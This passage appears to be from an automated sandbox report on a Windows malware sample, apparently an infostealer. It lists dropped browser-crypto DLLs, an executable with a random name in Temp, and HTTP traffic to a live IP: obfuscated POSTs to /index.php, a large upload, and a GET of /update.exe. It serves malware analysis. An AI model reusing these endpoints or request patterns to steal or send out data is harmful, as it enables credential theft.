764 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
765 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
766 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
767 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
768 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
769 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
770 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
771 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
772 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
773 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
774 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
775 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
776 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
777 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
778 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
779 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
780 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
781 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
782 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
783 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
784 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
785 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
786 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
787 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
788 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
789 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
790 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
791 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
792 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
793 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
794 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
795 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
796 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
797 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
798 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
799 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
800 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
801 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
802 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
803 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
804 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
805 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
806 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
807 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
808 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
809 "C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe"
810
811
812* Modified Registry Keys:
813
814* Deleted Registry Keys:
815
816* DNS Communications:
817
818* Domains:
819
820* Network Communication - ICMP:
821
822* Network Communication - HTTP:
823
824 "count": 1,
825 "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
826 "uri": "http://45.76.87.43/index.php",
827 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
828 "method": "POST",
829 "host": "45.76.87.43",
830 "version": "1.1",
831 "path": "/index.php",
832 "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
833 "port": 80
834
835
836 "count": 1,
837 "body": "",
838 "uri": "http://45.76.87.43/index.php",
839 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
840 "method": "POST",
841 "host": "45.76.87.43",
842 "version": "1.1",
843 "path": "/index.php",
844 "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nContent-Length: 19699671\r\nCache-Control: no-cache\r\n\r\n",
845 "port": 80
846
847
848 "count": 1,
849 "body": "",
850 "uri": "http://45.76.87.43/update.exe",
851 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
852 "method": "GET",
853 "host": "45.76.87.43",
854 "version": "1.1",
855 "path": "/update.exe",
856 "data": "GET /update.exe HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 45.76.87.43\r\nCache-Control: no-cache\r\n\r\n",
857 "port": 80
858
859
860
861* Network Communication - SMTP:
862
863* Network Communication - Hosts:
864
865 "country_name": "Germany",
866 "ip": "45.76.87.43",
867 "inaddrarpa": "",
868 "hostname": ""
869
870
871
872* Network Communication - IRC: